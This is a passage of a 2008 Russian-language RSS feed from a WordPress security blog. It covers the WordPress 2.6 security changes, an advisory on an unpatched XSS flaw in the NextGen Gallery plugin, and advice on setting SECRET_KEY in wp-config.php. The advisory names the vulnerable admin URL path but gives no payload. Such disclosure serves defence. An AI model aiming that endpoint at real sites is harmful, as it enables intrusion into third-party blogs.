	<li><a href="http://wp-guard.com/uyazvimost-v-plagine-wordpress-spreadsheet-06/" title="Уязвимость в плагине Wordpress Spreadsheet 0.6 (Апрель 23, 2008)">Уязвимость в плагине Wordpress Spreadsheet 0.6</a> (0)</li>
</ul>

<div class="feedflare">
<a href="http://feeds.feedburner.com/~f/wp-guard?a=5F3vtJ"><img src="http://feeds.feedburner.com/~f/wp-guard?i=5F3vtJ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/wp-guard/~4/346432693" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://wp-guard.com/uyazvimost-wordpress-plugin-download-manager-02/feed/</wfw:commentRss>
		<feedburner:awareness>http://api.feedburner.com/awareness/1.0/GetItemData?uri=wp-guard&amp;itemurl=http%3A%2F%2Fwp-guard.com%2Fuyazvimost-wordpress-plugin-download-manager-02%2F</feedburner:awareness><feedburner:origLink>http://wp-guard.com/uyazvimost-wordpress-plugin-download-manager-02/</feedburner:origLink></item>
		<item>
		<title>Wordpress 2.6 - еще больше безопасности</title>
		<link>http://feeds.feedburner.com/~r/wp-guard/~3/342271866/</link>
		<comments>http://wp-guard.com/wordpress-26-more-secure/#comments</comments>
		<pubDate>Tue, 22 Jul 2008 06:18:31 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Безопасность]]></category>

		<category><![CDATA[Обновления]]></category>

		<category><![CDATA[WordPress]]></category>

		<category><![CDATA[Wordpress 2.6]]></category>

		<guid isPermaLink="false">http://wp-guard.com/?p=16</guid>
		<description><![CDATA[Вышла новая версия лучшего движка для блогов - Wordpress 2.6. В новой версии исправлено очень много ошибок и уязвимостей, а также проделано много работы для повышения безопасности блога.

Теперь после установки Wordpress на новый блог, по умолчанию протокол удаленной работы с блогом XML-RPC отключен, до тех пор, пока администратор блога не активирует его в настройках. Теоритически [...]]]></description>
			<content:encoded><![CDATA[<p>Вышла новая версия лучшего движка для блогов - <a href="http://blogproblog.com" title="Создать блог Wordpress" onclick="javascript:pageTracker._trackPageview ('/outbound/blogproblog.com');">Wordpress</a> 2.6. В новой версии исправлено очень много ошибок и уязвимостей, а также проделано много работы для повышения безопасности блога.</p>
<ul>
<li>Теперь после установки Wordpress на новый блог, по умолчанию протокол удаленной работы с блогом XML-RPC отключен, до тех пор, пока администратор блога не активирует его в настройках. Теоритически возможность атаки блога через этот протокол существует, а блоггеров которые активно пользуются этим протоколом не так уж и много, поэтому данная мера должна немного повысить безопасность вашего блога.</li>
<li>Полная поддержка работы по протоколу шифрования SSL. Никаких плагинов и настроек делать не нужно, если возможно то Wordpress сам будет пытаться работать через зашифрованное подключение SSL.</li>
<li>Улучшения работы с базой данных и хранением сессий пользователей.</li>
</ul>
<p>Помимо всего этого, обновление до версии Wordpress 2.6 исправляет 194 ошибки, которые небыли исправлены в 2.5.1.</p>
<p>Лично я уже обновил все свои <a href="http://topproblog.com" title="Советы блоггерам - лучшее про блоги" onclick="javascript:pageTracker._trackPageview ('/outbound/topproblog.com');">блоги</a> до версии 2.6, хотя на многих сайтах рекомендуют подождать немного, что бы посмотреть как будет работать новая версия. С уверенностью заявляю, пока что новая версия Wordpress 2.6 на моих ресурсах работает отлично.</p>
<p>Скачать русскую версию Wordpress 2.6 вы можете на официальном <a href="http://ru.wordpress.org/" title="Скачать Wordpress" onclick="javascript:pageTracker._trackPageview ('/outbound/ru.wordpress.org');">сайте Wordpress</a>.</p>

	<h4>Связанные записи</h4>
	<ul class="st-related-posts">
	<li><a href="http://wp-guard.com/srochnoe-obnovlenie-bezopasnosti-wordpress-233/" title="Срочное обновление безопасности WordPress 2.3.3 (Февраль 5, 2008)">Срочное обновление безопасности WordPress 2.3.3</a> (0)</li>
	<li><a href="http://wp-guard.com/wp-no-version-update/" title="Обновлен плагин wp-no-version (Февраль 13, 2008)">Обновлен плагин wp-no-version</a> (0)</li>
	<li><a href="http://wp-guard.com/sql_vuln_admin_password_wp_2_6_1/" title="Уязвимость усечения данных в SQL Wordpress 2.6.1 (Сентябрь 8, 2008)">Уязвимость усечения данных в SQL Wordpress 2.6.1</a> (3)</li>
	<li><a href="http://wp-guard.com/uyazvimosti-v-contact-form-dlya-wordpress/" title="Уязвимости в Contact Form ][ для Wordpress (Август 14, 2008)">Уязвимости в Contact Form ][ для Wordpress</a> (0)</li>
	<li><a href="http://wp-guard.com/sekretnye-klyuchi-v-wordpress-26/" title="Секретные ключи в Wordpress 2.6 (Июль 28, 2008)">Секретные ключи в Wordpress 2.6</a> (0)</li>
</ul>

<div class="feedflare">
<a href="http://feeds.feedburner.com/~f/wp-guard?a=RKNkMJ"><img src="http://feeds.feedburner.com/~f/wp-guard?i=RKNkMJ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/wp-guard/~4/342271866" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://wp-guard.com/wordpress-26-more-secure/feed/</wfw:commentRss>
		<feedburner:awareness>http://api.feedburner.com/awareness/1.0/GetItemData?uri=wp-guard&amp;itemurl=http%3A%2F%2Fwp-guard.com%2Fwordpress-26-more-secure%2F</feedburner:awareness><feedburner:origLink>http://wp-guard.com/wordpress-26-more-secure/</feedburner:origLink></item>
		<item>
		<title>XSS уязвимость плагина Nextgen gallery</title>
		<link>http://feeds.feedburner.com/~r/wp-guard/~3/314891821/</link>
		<comments>http://wp-guard.com/xss-uyazvimost-plagina-nextgen-gallery/#comments</comments>
		<pubDate>Wed, 18 Jun 2008 20:53:05 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Плагины]]></category>

		<category><![CDATA[Уязвимости]]></category>

		<category><![CDATA[Nextgen Gallery]]></category>

		<guid isPermaLink="false">http://wp-guard.com/?p=15</guid>
		<description><![CDATA[В плагине Nextgen Gallery, версии &#60;= 0.96 была найдена уязвимость XSS
Злоумышленник, может без авторизации использовать следующий скрипт:
http://[host]/[directory]/wp-admin/admin.php?page=nggallery-manage-gallery

Насколько известно, исправлений в данный момент не существует.

	Связанные записи
	
	Уязвимость плагина WP-Photo-Album (0)
	Уязвимость в плагине Wordpress Spreadsheet 0.6 (0)
	Уязвимость SQL-инъекции в плагине WP Comment Remix (1)
	Уязвимости в плагинах wp-people, Simple Forum, WP Photo Album, Search Unleashed, Sniplets (0)
	Уязвимости в плагинах [...]]]></description>
			<content:encoded><![CDATA[<p>В плагине <a href="http://wordpress.org/extend/plugins/nextgen-gallery/" rel="nofollow" target="_blank" onclick="javascript:pageTracker._trackPageview ('/outbound/wordpress.org');">Nextgen Gallery</a>, версии &lt;= 0.96 была найдена уязвимость XSS</p>
<p>Злоумышленник, может без авторизации использовать следующий скрипт:</p>
<pre>http://[host]/[directory]/wp-admin/admin.php?page=nggallery-manage-gallery
</pre>
<p>Насколько известно, исправлений в данный момент не существует.</p>

	<h4>Связанные записи</h4>
	<ul class="st-related-posts">
	<li><a href="http://wp-guard.com/wp-photo-album-vulnerability/" title="Уязвимость плагина WP-Photo-Album (Февраль 16, 2008)">Уязвимость плагина WP-Photo-Album</a> (0)</li>
	<li><a href="http://wp-guard.com/uyazvimost-v-plagine-wordpress-spreadsheet-06/" title="Уязвимость в плагине Wordpress Spreadsheet 0.6 (Апрель 23, 2008)">Уязвимость в плагине Wordpress Spreadsheet 0.6</a> (0)</li>
	<li><a href="http://wp-guard.com/uyazvimost-sql-inekcii-v-plagine-wp-comment-remix/" title="Уязвимость SQL-инъекции в плагине WP Comment Remix (Октябрь 22, 2008)">Уязвимость SQL-инъекции в плагине WP Comment Remix</a> (1)</li>
	<li><a href="http://wp-guard.com/advisories-wp-plugins-2702/" title="Уязвимости в плагинах wp-people, Simple Forum, WP Photo Album, Search Unleashed, Sniplets (Февраль 27, 2008)">Уязвимости в плагинах wp-people, Simple Forum, WP Photo Album, Search Unleashed, Sniplets</a> (0)</li>
	<li><a href="http://wp-guard.com/uyazvimosti-v-plaginax-wp-calc-i-wp-adserv/" title="Уязвимости в плагинах wp-calc и wp-adserv (Февраль 4, 2008)">Уязвимости в плагинах wp-calc и wp-adserv</a> (0)</li>
</ul>

<div class="feedflare">
<a href="http://feeds.feedburner.com/~f/wp-guard?a=UW4HYI"><img src="http://feeds.feedburner.com/~f/wp-guard?i=UW4HYI" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/wp-guard/~4/314891821" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://wp-guard.com/xss-uyazvimost-plagina-nextgen-gallery/feed/</wfw:commentRss>
		<feedburner:awareness>http://api.feedburner.com/awareness/1.0/GetItemData?uri=wp-guard&amp;itemurl=http%3A%2F%2Fwp-guard.com%2Fxss-uyazvimost-plagina-nextgen-gallery%2F</feedburner:awareness><feedburner:origLink>http://wp-guard.com/xss-uyazvimost-plagina-nextgen-gallery/</feedburner:origLink></item>
		<item>
		<title>Уязвимость секретного ключа в wordpress 2.5</title>
		<link>http://feeds.feedburner.com/~r/wp-guard/~3/309603734/</link>
		<comments>http://wp-guard.com/uyazvimost-sekretnogo-klyucha-v-wordpress-25/#comments</comments>
		<pubDate>Wed, 11 Jun 2008 12:52:31 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Безопасность]]></category>

		<category><![CDATA[Уязвимости]]></category>

		<category><![CDATA[Wordpress 2.5]]></category>

		<category><![CDATA[Пароли]]></category>

		<guid isPermaLink="false">http://wp-guard.com/?p=14</guid>
		<description><![CDATA[Очень важно при обновлении или установке Wordpress обратить внимание на параметр "SECRET_KEY", с этим параметром связана безопасность паролей в вашем блоге.
В новых версиях Wordpress этот ключ стали использовать для усиления алгоритма криптования паролей md5, поэтому очень важно иметь в качестве этого параметра какую-то длинную строчку с различными символами, дабы усложнить процесс расшифровки вашего пароля, если [...]]]></description>
			<content:encoded><![CDATA[<p>Очень важно при обновлении или установке <a href="http://blogproblog.com" title="Техническая поддержка WordPress блогов" onclick="javascript:pageTracker._trackPageview ('/outbound/blogproblog.com');">Wordpress</a> обратить внимание на параметр "<strong>SECRET_KEY</strong>", с этим параметром связана безопасность паролей в вашем блоге.</p>
<p>В новых версиях Wordpress этот ключ стали использовать для усиления алгоритма криптования паролей md5, поэтому очень важно иметь в качестве этого параметра какую-то длинную строчку с различными символами, дабы усложнить процесс расшифровки вашего пароля, если не дай то бог, злоумышленник получил доступ к зашифрованным паролям.</p>
<p>При установке или обновлении блога, Wordpress изначально не предлагает изменить эту строчку и вообще о ней ничего не говорит, именно поэтому у большинства блоггеров этот параметр выглядит примерно вот так: "<strong>put your unique phrase here</strong>".</p>
<p>Если вам лениво придумывать длинный набор символов, для этого параметра, воспользуйтесь <a href="https://www.grc.com/passwords.htm" onclick="javascript:pageTracker._trackPageview ('/outbound/www.grc.com');">онлайн сервисом</a>, который сгенерирует для вас подходящую строчку. После этого, откройте файл wp-config.php и измените стандартную строку "<strong>put your unique phrase here</strong>" на строчку которую вы сгенерировали на сайте. Сохраните изменения и закачайте файл на сервер.</p>

	<h4>Связанные записи</h4>
	<ul class="st-related-posts">
	<li><a href="http://wp-guard.com/sql_vuln_admin_password_wp_2_6_1/" title="Уязвимость усечения данных в SQL Wordpress 2.6.1 (Сентябрь 8, 2008)">Уязвимость усечения данных в SQL Wordpress 2.6.1</a> (3)</li>
	<li><a href="http://wp-guard.com/uyazvimosti-v-plaginax-e-commerce-media-holder/" title="Уязвимости в плагинах Media Holder и e-Commerce (Ноябрь 3, 2008)">Уязвимости в плагинах Media Holder и e-Commerce</a> (0)</li>
	<li><a href="http://wp-guard.com/uyazvimosti-v-contact-form-dlya-wordpress/" title="Уязвимости в Contact Form ][ для Wordpress (Август 14, 2008)">Уязвимости в Contact Form ][ для Wordpress</a> (0)</li>
	<li><a href="http://wp-guard.com/ne-soxranyajte-paroli-v-ftp-programmax/" title="Не сохраняйте пароли в ФТП программах. (Февраль 12, 2008)">Не сохраняйте пароли в ФТП программах.</a> (5)</li>
	<li><a href="http://wp-guard.com/wp-photo-album-vulnerability/" title="Уязвимость плагина WP-Photo-Album (Февраль 16, 2008)">Уязвимость плагина WP-Photo-Album</a> (0)</li>
</ul>

<div class="feedflare">
<a href="http://feeds.feedburner.com/~f/wp-guard?a=9LzrrI"><img src="http://feeds.feedburner.com/~f/wp-guard?i=9LzrrI" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/wp-guard/~4/309603734" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://wp-guard.com/uyazvimost-sekretnogo-klyucha-v-wordpress-25/feed/</wfw:commentRss>
		<feedburner:awareness>http://api.feedburner.com/awareness/1.0/GetItemData?uri=wp-guard&amp;itemurl=http%3A%2F%2Fwp-guard.com%2Fuyazvimost-sekretnogo-klyucha-v-wordpress-25%2F</feedburner:awareness><feedburner:origLink>http://wp-guard.com/uyazvimost-sekretnogo-klyucha-v-wordpress-25/</feedburner:origLink></item>
	<feedburner:awareness>http://api.feedburner.com/awareness/1.0/GetFeedData?uri=wp-guard</feedburner:awareness></channel>
</rss>
